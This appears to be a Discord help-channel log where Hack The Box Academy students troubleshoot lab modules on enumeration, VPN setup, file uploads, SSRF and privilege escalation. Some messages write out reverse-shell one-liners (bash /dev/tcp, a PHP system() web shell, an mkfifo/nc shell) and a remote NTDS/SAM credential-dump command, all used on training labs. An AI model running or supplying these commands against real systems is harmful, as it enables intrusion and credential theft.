#modules
Thank lord cuz its 7am haven't slept all night
Happier days will come. I've overcome the password attacks module, for a while it's cruise before the AD module
Does anybody need an extra in their group for CTF events etc. (B.S in Cybersecurity, Security+, & currently focusing on more Linux/Python and CYSA+) clearly focused more on the defensive side but want to work more on the offensive side 🧐
Guys I found this in Task scheduling section of the Linux fundamentals module, is this a mistake from HTB or am I looking at it the wrong way
Cleanup DB
0 0 * * 0 /path/to/scripts/clean_database.sh
The third task, Cleanup DB, is to be executed every Sunday at midnight. This is specified by the entries 0 and 0 in the minute and hour columns and 0 in the days-of-the-week column. The task is executed by the clean_database.sh script, whose path is given in the last column.
Backups
0 0 * * 7 /path/to/scripts/backup.sh
The fourth task, backups, is to be executed every Sunday at midnight. This is indicated by the entries 0 and 0 in the minute and hour columns and 7 in the days-of-the-week column. The task is executed by the backup.sh script, whose path is given in the last column.
if Sunday is 0 in first one then why is it 7 in second one
Sunday is 0 or 7
Perhaps it's stated like that to make you look in to the documentation and understand that fact
Hello everyone, anyone completed Dog HTB Machine
How can i get invite link to forum.hackthebox.com?
The forums are no longer supported, and are in read only mode.
It’s sad, cuz i can’t find any answer to my question(
Thx
Ask your question here
OR in the relevant channel
Note, that you will not always get an answer, or nudge
Can anyone give a hint on the last question for AD Trust Attacks SA?
Hello!! I am working on the Windows File Transfer Methods module "https://academy.hackthebox.com/module/24/section/160", and doing some tests I am having different "errors", when using PowerShell DownloadString I am getting blocked by the antivirus, that is fair enough, but when using Invoke-WebRequest it is telling me that the remote host could not be resolved, can anyone tell me why? I just copied the instruction and I also tried a different github url, but same result
Hey everyone, I'd like some help with the getting started module, specifically the public exploits section. So, the basis for the lab is to use web enumeration and metasploit to capture the flag on the target. Here has been my process thus far:
- run: nmap -sV [target ip]
- when I did this the first time, it returned that nginx was running on an open port. Seeing how nginx has several vulnerabilities I figured that was the key and loaded it into metasploit
- metasploit couldn't launch the exploit saying that the service was unresponsive
- I went back to nmap and ran the command again and now the only services found are rpcbind and openssh, neither of which seem to have viable exploits
- I tried resetting the instance and the target, but nginx never shows up again.
Is this a bug? Or, is rpcbind or openssh the true path to solving this?
I believe this module/section only gives you one port, is that correct? If a skill assessment only gives you one port, that's the port you should focus on.
I would reset the box if the scan is showing different results from before
Also try browsing to it as well as nmap scan
There is no need to nmap scan. There is only one port running a web service, if you navigate to the page it should be very obvious what you should search an exploit for.
Ah, ok
Thanks guys
The only caveat you may need to know is use http:// instead of https://
Hey everyone! 👋
I’m new to cybersecurity and just beginning my journey. I transitioned from the medical field after 12 years because I wasn’t happy in my career. After taking a career assessment, I scored high for a career in IT, which really motivated me to make the switch!
I have some prior experience with tech—I took an elective in Python programming back in college, and I’ve also completed IT and Network Fundamentals courses. Last week, I officially decided to pursue cybersecurity, and I’ll be starting my Bachelor’s in IT in April 2025!
Right now, I’m diving into HTB Academy, but I’m not sure where to start. Should I begin with the Skill Path or the Job Role Path first? Any advice from those who’ve been through it would be greatly appreciated!
Looking forward to learning with you all! 🚀
If you know linux/windows fundamentals I'd start on the job role path.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks
hey i was trying to setup my own environment with htb, and i have everything installed correctly i think, but when i try to link my htb account, i get this error message. if anyone can help it would be greatly appreciated. thanks
Uhh, that's not how you link an account
You're trying to initiate a conda environment, but are prefixing the command with CyberApocalypse@htb[/htb]$
Did you paste the right screenshot?
well maybe i'm missing something.. https://academy.hackthebox.com/module/292/section/3290 this is where i'm at, i followed all the windows installation instructions
and then when i go down to the init section, is kind of where i'm lost at
..but yeah, you are pasting more than you need to
The command you want to run is just like "conda init"
well it's the beginning of the module where it's telling me how to setup my own environment
without what looks like a bash prompt before it
how do i set it up to where i have my htb account instead of my C:>?
ohhh
It's just an example of how the bash shell would look under the Pwnbox
Anyway, not done that module, so others may be of more help 🙂
thanks for the help!
you want it to look like this?
you may not be able to get it to do EXACTLY that but if you're interested in customizing your prompt string, look into powershell and/or linux promptstring ($PS1 i think is the env var in linux) customizations. if you use kali, look into p10k theme for zsh it has a wizard for customizing PS1
yo i didnt know where to ask because i dont have access to general but where can i find my account identifier
Yes it so great to here let to it
app.hackthebox.com right? then go to your account settings -> security settings ->
@unique spruce ^
pretty sure it should kick over
still hasnt
thanks
Very big on the right hand side
log out of htb and quit discord, restart log back in first, then launch discord
i was on the little thing inbetween labs and academy
thats weird, why isnt that piece in the security settings where the discord link is?
or at least a link to in that security settings section that takes you to the link you posted
Cos linking discord on that isnt fully integrated yet
oic
Cant post in erratum for some reason but there is a typo in Info gathering - web edition | Subdomain Bruteforcing where the bash code for dnsenum uses a different wordlist than the one being referred to prior and afterward... harmless but bugs me for some reason lol
Literally if you read the first four words
I typed up a whole thing but everytime I try to post it just returns "Error"
Get verified, instructions ---> #welcome
why
:( man im too lazy for that right now
Hey guys, I’m pissed cus I’m so close to finishing the CBBH path, but stuck on the last section for Hacking Wordpress skills assessments. Any tips on just the final question?
Please dont share skill assessment details, just wait for someone and take it to DMs (please remove last part of your message)
Sorry about that. Edited the message
Hey I'm working on the Skills Assessment for Intro to Assembly Language, Task 1. I have what I believe are the 14 pieces of the encoded shellcode, and have concatenated them in every way that I can think of. Would someone with experience in Assembly DM me please?? That would be awesome
can anyone give me a hand with Skills Assessment - File Upload Attacks? https://academy.hackthebox.com/module/136/section/1310
I have been able to get the source code for upload.php and identify the upload directory via svg.
being that I cant do anything else. I tried to read /flag.txt and /flag without success.... also unable to upload webshell to the uploads directory.
take a closer look at the functions; it's doing something to the uploaded filename 😉
you mean the whitelist and blacklist functions?
nope
you said you leaked the uploads.php; take a close look at what it does with the filename
if it helps run the code locally with php -r and replace the reference to the filename with a test name
@vague yoke my dms aren't open for module help; it should be fairly obvious, it's near the top of the file
hello
i am in Stack-Based Buffer Overflows on Linux x86 module
i have problem with the address
i dont know why 0xc2 is in my buffer
your code is throwing away results
Not to distract the question. But is this module good so far? I want to try it after CBBH
I realized that, which is why I captured them manually.
I don't want to spoil by listing out the values here, but assuming they are correct, I think my problem is with the concatenation, which I have been running with the python script "loader.py" from the module, which executes shellcode directly from hex.
sorry
its just intro
after this i want to go to pwn.college
I do challenges from there every now and then. It’s legit stuff
Any hints please?
@lost kiln intro to ASM is above tier 0 don't spoil code from the module
all the tactics you need are covered by the module
I am stuck with this question 
¯_(ツ)_/¯
take it one step at a time; maybe double extensions might be a way forward
to be clear: the results you get are -- only images allowed? or extension not allowed?
I got both depending on the test ....
well --> only images allowed is a key to move forward
:) don't forget about magic bytes
tried that too, GIF8 🙂
During the skills assessment of SQLMap Essentials when i try to get information it comes blank why?
1:53:00] [INFO] retrieved:
[21:53:01] [CRITICAL] unable to retrieve the database names
Nevermind some tampering messed the output up
it worked just fine now
I give up for today. will try again tomorrow.
do you need some help?
help pls
Ask your question by not posting content from the module directly please, only tier 0 is allowed to be posted.
ohh
I need help but i dont want to give out information regarding how to solve target in the Getting Started Module...
You could post here and say what you're stuck on
well, yesterday i was having issues running an nmap scan on a target, unless I specified the port it never gave me any results on other open ports. so i searched for exploits on the port that i did get results from and i did find some but none of them are in metasploit and that's the whole idea of the module section. Not sure if I still have to try to run the exploits i found though they're not related to what was taught in the module section?

Which section?
Public Exploits
If you notice on the target that spawns, it provides a port. Whenever you see that on the HTB Academy platform, that means it's only that port you have to worry about. Don't bother with nmap, just visit that IP and port in your browser. You can click on the IP and paste it into your browser's address bar. It should be pretty straight forward as to which public exploit to find after that 😉
really? ok Ill give it a go with that, thanks for your time.
this is information given in the Intro to Academy module btw about targets and how to interact with them
A break is really useful tomorrow you'll have a clear mind and ace the question
Hello! I'm new here. Anyone available to help me out with the linux fundamentals?
Hii, anyone interested in taking part in cyber apocalypse
Be more specific, which section, what question?
my apologies. I'm on Linux fundamentals. System info. It asks for the htb-student's home directory? But as far as I've come to understand, I thought the tilde was the directory?
nope
~ is just the shorthand for the home directory
if you either pwd or echo $HOME you may find it more helpful, or running env to get a list of the environment variables
thank you @fathom pendant, i'm not sure why it doesn't like those answers
?
are you ssh to the target?
i believe so
pwnbox != target
spawn instance spawns pwnbox
spawn target spawns target
if your username is htb-ac-<numbers> then you're on the pwnbox, not ssh to the target
i ran out of time. i'm stressed out lol maybe i'll figure it out tomorrow. Thank you
ok so I found the exploit...but its not working...could it have been patched? (thats one of the suggestions i find online)
I'm stuck on DACL Attacks II Skills Assessment, 2nd flag. Hint is: Create and Link. I have access to the creator account. There are two linkers, but there are no ACL entries where any users I own have privileges over the linkers. I'm not sure how to move forward from here.
modules don't tend to get patched for the intended exploit path
they get patched for unintendeds if it massively bypasses the learning aspect
but the labs are usually well written
but it's not likely the intended exploit has been patched
it's a simple file read exploit; no RCE
thing is when looking for show actions there are none so i cant set one and if I dont the only thing it does is scan
?
did you search the plugin that's given on the webpage you're given?
or did you assume the target was gonna be SMB like the examples and are shooting yourself in the foot
I searched the Plugin I changed my target IP, the port and the file path to the flag and ran the exploit but it only scanned
no hehe
normally not open to dms but i wanna see where you fucked up
if anything try resetting the target and trying again
If it’s metasploit, the correct one is show options not show actions 🙂
just options not show options
Both works
yeah but who knows if they'll keep show as part of the syntax
but actions is empty
<actions> isn't valid :)
show actions*
dm me bc i wanna see what your options look like
still, not valid
DMed you some screenshots
Hi,
Module: Windows Privilege Escalation
Section: DnsAdmins
Section Link: https://academy.hackthebox.com/module/67/section/603
I managed to add netadm user to the Domain Admins group, which is shown when I run the net group command. But when I run the command whoami /groups , Domain Admins is not seen. Anyways, I tried to access the flag. But I am not allowed. Why?
Think of a way to refresh the current access token assigned to the user so it updates the privileges
it is something simple
what does this question expect?? nothing i enter seems to work (ping if you reply pls)
It expects numbers like the format shows
yh i tried that
6.11+parrot-amd64
is what uname -r gives me
/proc/version gives 6.11.5-1parrot1 @west rampart
You have the answer imo.
yh but it wont work
What did you try?
Well what's your module?
make sure you've connected to the target machine
Hey! I found a typo in Web Fuzzing module "Tooling" section. Should be "an" not "a". Someone can fix it?
That's the version on your pwn box, not the target.
i didnt get a target ip, this is the version of pwnbox uname returns 6.11+parrot..
im under system information rn, didnt receive a target ip
you need to spawn the target machine
those types of nuances are explained in the Intro to Academy module
oh tysm! i found the area. man now i feel blind
Apologies, I posted this to the correct place now. Thank you!
idk why but reverse shell on Nibbles just aint working
I tried different technique
copied from youtubers and such
uploaded a php file, testing it out with just the id command, now I have nc -nvlp 4444 setup ready but when I use /bin/bash -i >& /dev/tcp/10.10.14.188/4444 0>&1 it doesnt work, I even tried replacing the "&" to %26, I tried other php reverse shells. What am I doing wrong?
probably some parsing issues, have you tried uploading the php file with the revshell command in it?
e.g
<?php system("<COMMAND HERE>")?>
yes I'm using : <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1888 4444>/tmp/f"); ?>
Anyone able to lend a hand with pivoting tunnelling and port forwarding module. Specifically web server pivoting with rpivot I'm not sure if it's buggy or I'm doing something wrong
hi i'm doing this module, when i try to connect to ssh it connects and in the next second it disconnects 😩
https://academy.hackthebox.com/module/297/section/3413
Have you tried running as sudo?
Do you have another ssh connection open at all?
Try including the password in the initial command in "quotes" see if that helps
still not connecting 
Hey guys, hope yall are having a good day
Can someone please give me a clue or any help possible. I can't seem to get the answer right
https://academy.hackthebox.com/module/226/section/2416
Working with IDS/IPS -> Snort Rule Development -> keyword that should be specified right before the content keyword
Appreciate any help
can anyone check upon Nibbles, even on metasploit I can't even get a shell
That IP definitely doesn't exist
, double check it
ye typo in discord, is 188 in kali
what about using the normal bash revshell payload?
Here's the specific one I used
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.87/9001 0>&1'")?>
It's generally better to mention the module, section, and question rather than just the link so that it's easier to help you at a glance.
Have you tried: Restarting the target, Changing VPN regions, swapping to TCP vpn.
@waxen totem made that improvement, thanks
Thank you for the nudge! 🙂
Yeah I just tried again, and the creds I have don't work for ssh lol
what am i doing wrong here?
You didn’t add the port
In Host? I did that before chat gpt said it was wrong
Are u tryina sub domain enumerate ?
Dm the other command I think it might be something else
yo guys i need
help of course
im stuck on the last question in DNS in footprinting module
since like 3 hours
the question says: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
what i did so far:
i did a zone transfer on inlanefreight.htb and it showed some domains
i enumerated them all by DNS brute force, since none of them accepted zone transfer except for internal.inlanefreight.htb
only dev.inlanefreight.htb showed some sub domains, but enumerating them further showed none
i dont know what to do next
I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best :D
On my laptop it worked, but on my main desktop not very weird... maybe a setting in vmware?
parrot os security will work if ur just starting up
yes i understand that, im the exact thing of htb distro if possible, for example:
question: figure out what the group id of "alex" is
its going to range across systems and i need those question cause they help me learn best. Currently I have kali purple for small projects.
@leaden island ^^ :D
Yea vhost enumeration
Hi, I have a question.
I'm currently working on the Attacking FTP section in the Attacking Common Services module, but I can't seem to find any FTP service running on the target machine.
I already performed a full port scan, and these are the only open ports I can see:
└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 4000 --max-retries 2 -p-
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:36 EDT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 08:36 (0:00:10 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds
Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"
Or is something wrong with my current setup?
Any advice would be really appreciated. Thanks!
└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 500 --max-retries 2 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:35 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.01% done; ETC: 08:38 (0:00:46 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63373 closed tcp ports (reset), 2158 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 147.52 seconds
Maybe try -sT with mentioning ports 21, 20 and then check
Windows Priv Esc / Windows Built-in Groups (SeBackup)
I got a question, here we learned about copying the registry hives and dump ntds.dit file right. i found quick win using crackmapexec like so:
nxc smb <ip-here> -u username -p password123 --ntds # for ntds.dit dump remotely
or --sam for registry gives
why don't they work in this specific section's machine?
- if i remember correctly the quick win was given in Windows Local Password Attacks in passwords attack module.
thanks
└─$ sudo nmap -sT 10.129.186.83 -p 21,20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:48 EDT
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp closed ftp
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
I still can't see it.
Cause it's actually closed
Hi I am mounting a linux folder using xfreerdp "xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer", but I can't create or move files or folders on Windows while connecting remotely with xfreerdp, I don't have permissions, how can I solve this?
scan for all the ports
FTP might not be 21/20 if configured
Yea try -sT with all ports
└─$ sudo nmap -sT 10.129.186.83 -p- --min-rate 500 --max-retries 2 -Pn -n
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:54 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.93% done; ETC: 08:56 (0:02:13 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63602 closed tcp ports (conn-refused), 1929 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 165.88 seconds
I still can not see it...
Windows Privilege Escalation Windows Server command is not executable in server didn't find vulnerabilities to exploit via msfconsole can someone assist?
sudo nmap -sV --script ftp-* -p 21,20,2121,990 10.129.186.83
try doing this
└─$ sudo nmap -sV --script ftp-* -p 21,20,2121,990 10.129.186.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 09:05 EDT
Nmap scan report for 10.129.186.83
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
990/tcp closed ftps
2121/tcp closed ccproxy-ftp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"
im not sure
try reseting the machine
I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best. Ex: figure out what the group id of "alex" is. It's going to range across systems and i need those questions cause they help me learn best. Currently I have Kali Purple for small projects.
umm.. I already reset it three times...
what machine is this
let me check it out
HTB Academy - Attacking Common Services - Attacking FTP
better install kali on flash card and use your own kali connect via vpn and it will be better for you
ok
how am i supposed to ask a question when it keeps saying i can't ask the question?
yea but can't answer questions, (the little boxes down the bottom). for things like the example above. Currently I have a VPN w virtualbox kali
got any solutions
I have kali on vm and I am downloading vpn connection file and executing it with command openvpn Downloads/academy-regular.ovpn
and it connects me to htb
Constantly says:
This can't be posted because it contains content blocked by this server. This may also be viewed by server owners
ohh i didnt know they had a connection file?
nmap -sC -sV -p- 10.129.186.83 Try this @upbeat linden
yes search in it module there is a connection file down after the explanation section finishes
and i read you might need to reset the machine many times for the service to be up
scroll down and you will see it
so thatll connect me to a kali machine or..?
if so it means no more boot problems so yay
it will connect you to htb server and you can solve htb questions directly on your machine
you will see in the upper right corner of your kali the connection mark, it will typically be something like 10.10.15.51
lock and cable mark
lock and cable?
i roughly described how it will look
Im currently doing some powershell stuff and im going insane. Im ssh'd into the VM and I can interact with the machine, however I can't install any PS modules, because the machine cannot connect to the internet. When I try and test the connection using a builtin powershell cmdlet using a well known domain, it errors out and says it cant resolve the domain. It also can't install anything from the powershell gallery which is the reason im running into this issue.
Anyone had a similar issue before or know whats wrong or have any suggestions please let me know.
ok ill grab that connection file
thank you
yes and execute it with command openvpn Downloads/academy-regular.ovpn
typically it is downloaded into downloads
but check the folder where the file is
yh i understand
sometimes it can be in different place
i dont rlly use openvpn much,
did it work brother ?
you will have to
weird.
it doesnt limit ur access to their server does it?
Also i have reset the machine already and that doesn't help
yh idm abt that, im still in fundamentals
ill pay for that stuff if need be later or use another service
the pwnbox is limited kali will be unlimited but target will be limited
something like that
Well... nmap is still running. If Nmap can't find the FTP service again, I'm planning to keep resetting the machine until it works.....
Like suggested in the module, wait 2 minutes after the box starts up and then verify that the FTP service is running.
Even if the nmap scan does not report anonymous login, it does not mean you can’t anonymously fetch files from the FTP server. There are plenty of good tips in here about this.
these are some comments i found that might help you
@cerulean herald ur profile made me laugh man, i love it
I don't understand TARGETURI, "The base path to the cms", what does Metasploit mean by that?
hahahahahaha
thankss
Actually, I already waited for over 10 minutes, but it still didn’t work. I’m just going to try harder.
thank you so much
is it slow? if so i feel you
for module/77/section/859, found it runs on GetSimple CMS 3.3.15, but when I run this, it says "target si not vulnerable"
@flint palm what page gives me the vpn. i cant find it for the life of me
Click on your profile then vpn settings
nvm found it i think
oh east
I use sudo -b then it runs in background
what does it mean by each time you "switch"?
Each time you switch the country you will need to generate a new file
also tcp or udp
Udp
ah i see
dang why is that
Yea choose the country closest to you
yea... only gives me us and eu
Yea i forgot it's not tryhackme
Does the country I’m living in affect the lab environment by any chance?
i feel you
slower
They just have specific countries nothing much
same as a reg vpn
it may affect the connection
latency
dang
I guess you choose the recommended one then should have the lowest ping
You're on Windows?
kali
i alr did that
Does anyone know if you get a certificate (not certification) of completion for completing the Pentester Path? I want to get some CEUs
academy-regulr.ovpn
Then sudo -b openvpn whatever is the name of the file
do i have to run on each boot?
you get a badge, no certificate. you can share a link for the badge
you can with cronjobs I haven't tried it though
Ok, thank you. Just wondering how I would upload that to the CEU site. Would I need to take a screenshot of the course showing the amount of days and multiply by 8 hours in terms of hours of learning
you can get a copy of your transcript. i think that shows the modules you've completed and how long each one takes
should be in the HTB Academy account settings
That's what I'll need. Awesome. I appreciate you
will this work for me?? chatgpt gave me it
sudo systemctl enable openvpn-client@academy-reular
sudo systemctl start openvpn-client@academy-reular
ignore spelling mistake
no
if you plan on doing this then it will be a bit annoying to switch VPNs whenever you need to
wait am i high
i dont have others on this vm, what other ones do you have (if you dont mind)
connecting to VPN is as simple as sudo openvpn /path/to/file.ovpn, i think it's better to just have it running in the background or in another virtual desktop
if for whatever reason your connection isn't the greatest and need to switch to a different VPN in your region or switch the layer 3 protocol
im running this with htb vpn, i dont have any faster options 😭
you may also want to try out some of the machines on the main platform which requires another VPN file
that's why i say you're better off manually running the command and having it run in the background until you're done with Academy for the day
sorry im a bit confused, wym
in order to interact with HTB's labs, you need to VPN into their network
yep i got that
you do that using VPN software (OpenVPN) and a VPN file provided by HTB (.ovpn)
yep
Academy and Labs use different VPN files
and you cannot connect to both at the same time
using what you've learned in Academy to test vulnerable machines
Academy is guided learning, Labs is by yourself
at least for the active content you're by yourself
ohhh, as of now i will not be using labs. I've been using tryhackme and other services
or i had intended to, however im still working on fundamentals of linux
that's fine
wb man
Guys when I created msfvenom file for making reverse shell with windows using metasploit I set the port for 445 which is opened but when I used multi/handler it is trying to connect 4444 which is closed on that machine what to do?
you open the port
;-;
to open port you must have administrators right and I am not an administrator there!
so become an administrator
very limited privileges on the machine no possibility to become an administrator))
simply escalate privileges
hello everyone, where do I begin with htb?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thankiu 🙂
I'm doing the brute forcing module and it's asking me to install cupp, but i get this error on Kali, any advice?
try git clone https://github.com/Mebus/cupp.git
and dont forget to make it executable with chmod +x cupp.py
ty! 😄
hello im on the cpts path and im on the footprinting module dns and i keep getting nxdomain when i try to find the fqdn and i cant find the address ending in 203
would rly appreciate the help
I can't seem to connect to the windows server to test file permissions.
Module link: https://academy.hackthebox.com/module/49/section/1017
Section: Using smbclient to list available shares
I type this in > smbclient -L SERVER_IP -U htb-student replacing the server_ip with the ip used to access the windows through rdp. And i get > Connection to 10.129.62.123 failed (Error NT_STATUS_IO_TIMEOUT)
Try with this format ////TargetIp//
You can also specify the share your trying to access after "//" If anonymous log in is supported try the -N flag. Smbmap is better for file permissions
Hello everyone, wondering if I could discuss with someone the NMAP Hard-LAB. Just want to make sure I'm on the right track
like all I wanted to know is they are asking for one service or all the services
Still doesn't work, -N flag would be instead of the -L flag?
Also tried smbmap: smbmap -H 10.129.62.123 -u htb-student -p Academy_WinFun!
But doesn't detect hosts serving SMB
anyone have a good youtube video guide for "network enumeration with nmap" module?
So -L is to list the shares, -N is anonymous login. Try again with the given username; specifying the port that the smb is running on also might help. If using passwords in your command make sure you put it between quotes, having special characters like ! in there can throw it off, example -p 'password!23'
nvm figured it out
Anyone?
anyone help me with this query please 🙂
Hi everyone, anyone interested in helping me with the File Inclusion assessment? something goes very wrong with the webshell injection and I can't for the life of me figure out what I'm doing wrong 🤦♀️
If i use -N it gives me unrecognized argument error. And if I don't use -N flag it still doesn't work, this is my code:
smbmap -L -H 10.129.201.57 -u htb-student -p 'Academy_WinFun!'
That was for smbclient -N
Make sure you include the port number that the smbclient is running on I'm pretty sure I had similar issues with this
Hit by accident mate I'll look in my notes see if I have anything for you
With this one are you given the domain name and ipaddress and have you added this to the etc/hosts file
smbmap -L -H 10.129.201.57 -u htb-student -p 'Academy_WinFun!' -P 53 I got the port from doing netstat -tulpn and most where 53 but not sure if that is the way, because the smbmap still doesn't work
I did and I’got no answer
What module is it? I'll jump on now and have a quick look
NTFS vs. Share Permissions in the Windows Fundamentals
@round relic wait I might have found a solution on the htb forum
I had to turn off Windows firewall defender
Thank you for your help anyway @round relic 
Hi everyone,
Currently I'm working on Firewall and IDS/IPS Evasion - Hard Lab section from the "Network enumeration with Nmap" module. I found the service, but after trying several firewall and IDS/IPS evasion techniques, I can't get the service version back (I performed an ACK scan, I disabled ICMP Echo Request, DNS Resolution and ARP ping, I scanned the target using another IP address and from port 53, and I changed timing)
Can someone help me ?
Nice one mate always the same with these modules you'll try everything you can think of and waste hours if not days of time to find the answer staring you on the face
Have you tried -sVV flag with your scan
That or you try everything to realize you have a typo or used wrong ip😆
I've been there very recently. All i will say when copy and pasting back and forth between vms sometimes it will add in extra characters from what you copied
Yes but when I add the flag, the service becomes tcpwrapped
Hey 👋 I am new here, just getting into hack the box and learning about cyber security, trying to get into bug bounties and penetration testing.
@ashen light hi, nmap uses different scripts to bypass firewalls and IDS/IPS. you can find the official document here. https://nmap.org/nsedoc/
There is another tool that you can utilise for banner grabbing
Yes, I tried with netcat too, but It doesnt work
Try with sudo
Are you running the command as sudo
Hi everyone, I have problem with Cors misconfiguration, in Advanced XSS and csrf exploitation
will anyone help me please
Yes, but I have a timeout with netcat
DM
Are you using nc as opposed to ncat
I'm using nc, it's not the same ?
Nope, different versions I think, try with ncat
And make sure you're using sudo with this, if you're still having issues pm me
The hint provides the expected format for the answer
well judging from the hint that is the format just like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc
mybad just realized
in the windows fundamentals module, Operating System Structure, how do I get the actual GUI windows screen? Every time I try and spawn the windows target machine, it says LOGON FAILURE
Is anyone available to give me a hand in private with https://academy.hackthebox.com/module/136/section/1310 ? Skills Assessment - File Upload Attacks. I have spent several hours, done several things and I am still stuck. I can go through what I have done in detail. I was able to get some aspects of my attack to work fine, but I can't reach the end goal. I would really appreciate it if anyone can assist me with this as I am getting really frustrated and feel that either I am really close and missing something small or there is a problem in the lab. I worked on this question yesterday and today
anyone?
stuck on that too, trying different word lists
wordlists for what? for the extensions?
oh sorry that is for the dns
Hi im doing active directory enumeration & attacks > credentialed enumeration - from linux
When i try to run bloodhound i get an Error:"the futex facility returned an unexpected error code. Aborted"
What should i do?
EDIT: NEEDED TO RDP TO THE HOST
hi
is there anyone to help me with this ?
Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag. , Server-side Attacks
Page 3
Identifying SSRF
I managed to find the ports and still have issues accessing the machine to get the flag, the lesson doesn't give enough info
How did you find the port but can’t get access?
by using ffuf
but that doesn't help me that much to understand how to get the access or the flag
Curl? Burpsuite?
To determine whether the HTTP response reflects the SSRF response to us, let us point the web application to itself by providing the URL http://127.0.0.1/index.php: this thing I don't understand
I use burpsuite
But that’s not what they’re looking for
I did to find the ports, but I don't know what I should do next
what should I curl ?
Just like how you fuzzed it
I don't understand, you mean about ports?
Or capture the request burpsuite and change the port
Yes
I don't know how I should write the curl command
I tried this and got only this , ffuf -w ports.txt -u http://ip target:FUZZ -s -mc all
80
still didn't get enough info for the next step to understand how to get the access/flag
is there anyone who could help me with some more info ? :/ The lesson doesn't help me to get what I should do and I can't get further to understand what I do wrong
We can't offer assistance for such CTFs.
there is no one to help me ? :/ I tried also with chatgpt and no luck....
Did you fuzz the post request?
It’s just like the lesson
yes
and when I access it gives me an error that I cannot access
I also tried to curl all of them but nothing
Dm the command
Did you ever get past the Skills Assessment? I'm currently stuck on Q2. I am able to edit the script and know who the GPO creators/linkers are. I don't know how to get to the GPO linker accounts.
Still got the issue to get the next step :/
Hi, i'm at the password attacks module, performing Pass the Ticket from Linux, im a bit confused on the chisel+proxychains thing so I need to know if what i understood is valid:
We created a reverse tunnel using chisel so now we have a traffic coming to/from the MS01 host. We steal a Kerberos Ticket from LINUX01 (with another method we dont care for now), and when importing it to our attack host and use $ proxychains impacket-wmiexec dc01 -k this allows the impacket-wmiexec to spawn an interactive shell thanks to that ticket we previously imported that will serve as our pass when the wmiexec does its job on the target network? Thanks in advance and id appreciate any other useful resource or tip!
Is there going to be any module about OS/KERNEL EXPLOITATIONS and also PCI compliance techniques/methodoly etc?
kerberos tickets are an alternate authentication method within domains, so it's not as much of a password as it is a key or pass to access resources you request like how a ticket allows you to ride a train without trouble
PCI compliance: no
OS/Kernel Exploits: there's so many and such a wide range that depend on certain other factors; the privesc modules for windows and linux provide info on exploiting some commonly found ones (and some uncommon but good to check ones)
Hi, I know this isn't an academy question but any help would be appreciated. But why does this keep loading?
@nimble scroll that module is above t0, please don't post content from modules above t0.
Try CTRL+SHIFT+R to reload without using cache. If that doesn't work I'd suspect a network issue.
hello guys , i am in payload & shells host1 , i craft a payload and open multi handler and , navigate to the shell from the browser but i get 404 . can anyone help ?
Module: Pivoting, Tunneling, and Port Forwarding
Hello everyone! Can anyone help?
I’m trying to scan a host in the internal network through a pivot host using proxychains.
I use the command: proxychains nmap -vv -sV --top-ports=20 172.16.5.35
And I get the error: Segmentation fault (memory image flushed to disk)
When I use the command (without -sV): proxychains nmap -vv --top-ports=20 172.16.5.35
I don't get the error.
Of course, when I scan hosts in the local network, there is no issue with -sV. So it seems to be a problem with proxychains. But what’s the problem? The connection to the internal host is working fine; I can, for example, connect to the internal host via RDP through the pivot host.
I’m connecting via SOCKS5 proxy.
Has anyone encountered such an annoying problem?
If you're getting a 404 then the payload isn't there now is it?
either that or wrong path
SOCKS proxies can only work in full packets.
Does -sV scanning use another type of packets?
